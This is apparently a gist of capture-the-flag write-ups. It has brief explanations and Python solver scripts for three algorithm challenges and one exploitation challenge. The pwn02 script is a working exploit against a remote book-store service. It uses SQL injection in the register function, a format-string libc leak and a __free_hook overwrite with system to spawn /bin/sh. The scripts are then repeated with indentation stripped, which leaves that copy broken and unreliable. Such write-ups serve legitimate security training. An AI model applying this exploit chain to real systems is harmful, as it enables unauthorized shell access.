kungfulon/+writeup.md

## +writeup.md

      
    Raw
  

              +writeup.md
            
          
    acm01

Use dynamic programming:
ans[i] = 0 # i < 4
ans[i] = ans[i - 1] + (i - 1) * (i - 1) // 4 - (i - (i // 2 + 1)) # i >= 4
acm02

With linear dynamic programming solution, we can't solve for very large N.
Using matrix multiplication, we can reduce the complexity to logarithmic time.
acm03

Simple replace & eval.
pwn02

Exploiting SQL injection in register function to cheat points and format string vulnerability in reward function to get shell.

  
## acm01.py
#!/usr/bin/env python3

ans = [0] * 1000001

for i in range(4, 1000001):
	ans[i] = ans[i - 1] + (i - 1) * (i - 1) // 4 - (i - (i // 2 + 1))

from pwn import *

r = remote('15.164.75.32', 1999)

for i in range(0, 3):
    print(i)
    print(r.recvuntil('n = '))
    x = int(r.recvline().decode('ascii'))
    r.sendlineafter('Answer: ', str(ans[x]))

r.interactive()

## acm02.py
#!/usr/bin/env python3

from pwn import *
import numpy as np

MOD = 10 ** 39
def mul(A,B):
  n,m = A.shape
  m,p = B.shape
  C = np.zeros((n,p), dtype='object')
  for i in range(n):
    for j in range(p):
      s = 0
      for k in range(m):
        s += A[i][k] * B[k][j]
      C[i][j] = s % MOD
  return C

def power(A, k):
  n,n = A.shape
  if k == 1:
    C = np.copy(A)
    return C
  temp = power(A,k//2)
  temp2 = mul(temp,temp)
  if k%2==0:
    return temp2
  return mul(temp2,A)

def solve(n):
  A = np.ones((1,12), dtype='object')
  M = np.zeros((12,12), dtype='object')
  X = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], dtype='object')

  for i1 in range(4):
    for j1 in range(3):
      for i2 in range(i1+1,4):
        for j2 in range(3):
          if abs(i1-i2)*abs(j1-j2) == 2:
            M[i1*3+j1][i2*3+j2] += 1
            M[i2*3+j2][i1*3+j1] += 1

  if n == 1:
    ans = 3
  else:
    MX = mul(A, power(M,n-1))
    ans = MX[0][7] + MX[0][9] + MX[0][11]
  return ans % MOD

r = remote('15.165.30.141', 9399)

for i in range(0, 100):
    try:
        r.recvuntil('n = ')
        x = int(r.recvline().decode('ascii'))
        y = solve(x)
        r.sendlineafter('Answer: ', str(y))
        r.recvuntil('Thank you <3 Here is your reward: ')
        print(r.recvline().decode('ascii').strip(), end='')
    except:
        break

## acm03.py
from pwn import *

r = remote('52.78.36.66', 82)

def sanitize(formula):
    formula = formula.replace('~', ' not ')
    formula = formula.replace('*', ' and ')
    formula = formula.replace('+', ' or ')
    return formula

while True:
    print r.recvuntil('E1: ')
    E1 = r.recvline().strip()
    E2 = r.recvline()[3:-1]
    r.recvuntil('> ')
    print "Got E1: %s\nE2: %s\n" % (E1, E2)
    E1 = sanitize(E1)
    E2 = sanitize(E2)
    for i in range(512):
        A = i & 0x1
        B = i >> 1 & 0x1
        C = i >> 2 & 0x1
        D = i >> 3 & 0x1
        E = i >> 4 & 0x1
        F = i >> 5 & 0x1
        G = i >> 6 & 0x1
        H = i >> 7 & 0x1
        I = i >> 8 & 0x1
        E1r = bool(eval(E1))
        E2r = bool(eval(E2))
        if E1r != E2r:
            print('Sending NO')
            r.sendline('NO')
            break
    else:
        print('Sending YES')
        r.sendline('YES')
    print(r.recvline())

## pwn02.py
#!/usr/bin/env python3

from pwn import *

context.clear(arch='amd64', os='linux')
libc = ELF('./libc.so.6')

r = remote('13.124.117.126', 31337)

def register(u, p):
    r.sendafter('Choice: \n', '1')
    r.sendafter('Username: ', u)
    r.sendafter('Password: ', p)

def login(u, p):
    r.sendafter('Choice: \n', '2')
    r.sendafter('Username: ', u)
    r.sendafter('Password: ', p)

def enter_store():
    r.sendafter('Choice: \n', '3')

def sell(idx):
    r.sendafter('>> \n', '1')
    r.sendafter('Enter book id to sell: ', str(idx))

def reward(addr):
    r.sendafter('>> \n', '2')
    r.sendafter('Enter address: ', str(addr))

def exit_store():
    r.sendafter('>> \n', '3')

def write_book(n, a, c):
    r.sendafter('Choice: \n', '4')
    r.sendafter('Name: ', n)
    r.sendafter('Author: ', a)
    r.sendafter('Content: ', c)

register('1', "1', {:d}) -- ".format(2 ** 31 - 1))
login('1', '1')
enter_store()
reward('%p')
r.recvline()
libc_base = int(r.recvline().decode('ascii').strip(), 16) - 0x3ec7e3
log.info('libc_base = 0x{:x}'.format(libc_base))
reward(fmtstr_payload(8, {libc_base + libc.symbols['__free_hook']: libc_base + libc.symbols['system']}, write_size='short').decode('latin1'))
exit_store()
write_book('/bin/sh', '/bin/sh', '/bin/sh')
enter_store()
sell(0)
r.interactive()
	#!/usr/bin/env python3

	ans = [0] * 1000001

	for i in range(4, 1000001):
	ans[i] = ans[i - 1] + (i - 1) * (i - 1) // 4 - (i - (i // 2 + 1))

	from pwn import *

	r = remote('15.164.75.32', 1999)

	for i in range(0, 3):
	print(i)
	print(r.recvuntil('n = '))
	x = int(r.recvline().decode('ascii'))
	r.sendlineafter('Answer: ', str(ans[x]))

	r.interactive()
	#!/usr/bin/env python3

	from pwn import *
	import numpy as np

	MOD = 10 ** 39
	def mul(A,B):
	n,m = A.shape
	m,p = B.shape
	C = np.zeros((n,p), dtype='object')
	for i in range(n):
	for j in range(p):
	s = 0
	for k in range(m):
	s += A[i][k] * B[k][j]
	C[i][j] = s % MOD
	return C

	def power(A, k):
	n,n = A.shape
	if k == 1:
	C = np.copy(A)
	return C
	temp = power(A,k//2)
	temp2 = mul(temp,temp)
	if k%2==0:
	return temp2
	return mul(temp2,A)

	def solve(n):
	A = np.ones((1,12), dtype='object')
	M = np.zeros((12,12), dtype='object')
	X = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]], dtype='object')

	for i1 in range(4):
	for j1 in range(3):
	for i2 in range(i1+1,4):
	for j2 in range(3):
	if abs(i1-i2)*abs(j1-j2) == 2:
	M[i13+j1][i23+j2] += 1
	M[i23+j2][i13+j1] += 1

	if n == 1:
	ans = 3
	else:
	MX = mul(A, power(M,n-1))
	ans = MX[0][7] + MX[0][9] + MX[0][11]
	return ans % MOD

	r = remote('15.165.30.141', 9399)

	for i in range(0, 100):
	try:
	r.recvuntil('n = ')
	x = int(r.recvline().decode('ascii'))
	y = solve(x)
	r.sendlineafter('Answer: ', str(y))
	r.recvuntil('Thank you <3 Here is your reward: ')
	print(r.recvline().decode('ascii').strip(), end='')
	except:
	break
	from pwn import *

	r = remote('52.78.36.66', 82)

	def sanitize(formula):
	formula = formula.replace('~', ' not ')
	formula = formula.replace('*', ' and ')
	formula = formula.replace('+', ' or ')
	return formula

	while True:
	print r.recvuntil('E1: ')
	E1 = r.recvline().strip()
	E2 = r.recvline()[3:-1]
	r.recvuntil('> ')
	print "Got E1: %s\nE2: %s\n" % (E1, E2)
	E1 = sanitize(E1)
	E2 = sanitize(E2)
	for i in range(512):
	A = i & 0x1
	B = i >> 1 & 0x1
	C = i >> 2 & 0x1
	D = i >> 3 & 0x1
	E = i >> 4 & 0x1
	F = i >> 5 & 0x1
	G = i >> 6 & 0x1
	H = i >> 7 & 0x1
	I = i >> 8 & 0x1
	E1r = bool(eval(E1))
	E2r = bool(eval(E2))
	if E1r != E2r:
	print('Sending NO')
	r.sendline('NO')
	break
	else:
	print('Sending YES')
	r.sendline('YES')
	print(r.recvline())
	#!/usr/bin/env python3

	from pwn import *

	context.clear(arch='amd64', os='linux')
	libc = ELF('./libc.so.6')

	r = remote('13.124.117.126', 31337)

	def register(u, p):
	r.sendafter('Choice: \n', '1')
	r.sendafter('Username: ', u)
	r.sendafter('Password: ', p)

	def login(u, p):
	r.sendafter('Choice: \n', '2')
	r.sendafter('Username: ', u)
	r.sendafter('Password: ', p)

	def enter_store():
	r.sendafter('Choice: \n', '3')

	def sell(idx):
	r.sendafter('>> \n', '1')
	r.sendafter('Enter book id to sell: ', str(idx))

	def reward(addr):
	r.sendafter('>> \n', '2')
	r.sendafter('Enter address: ', str(addr))

	def exit_store():
	r.sendafter('>> \n', '3')

	def write_book(n, a, c):
	r.sendafter('Choice: \n', '4')
	r.sendafter('Name: ', n)
	r.sendafter('Author: ', a)
	r.sendafter('Content: ', c)

	register('1', "1', {:d}) -- ".format(2 ** 31 - 1))
	login('1', '1')
	enter_store()
	reward('%p')
	r.recvline()
	libc_base = int(r.recvline().decode('ascii').strip(), 16) - 0x3ec7e3
	log.info('libc_base = 0x{:x}'.format(libc_base))
	reward(fmtstr_payload(8, {libc_base + libc.symbols['__free_hook']: libc_base + libc.symbols['system']}, write_size='short').decode('latin1'))
	exit_store()
	write_book('/bin/sh', '/bin/sh', '/bin/sh')
	enter_store()
	sell(0)
	r.interactive()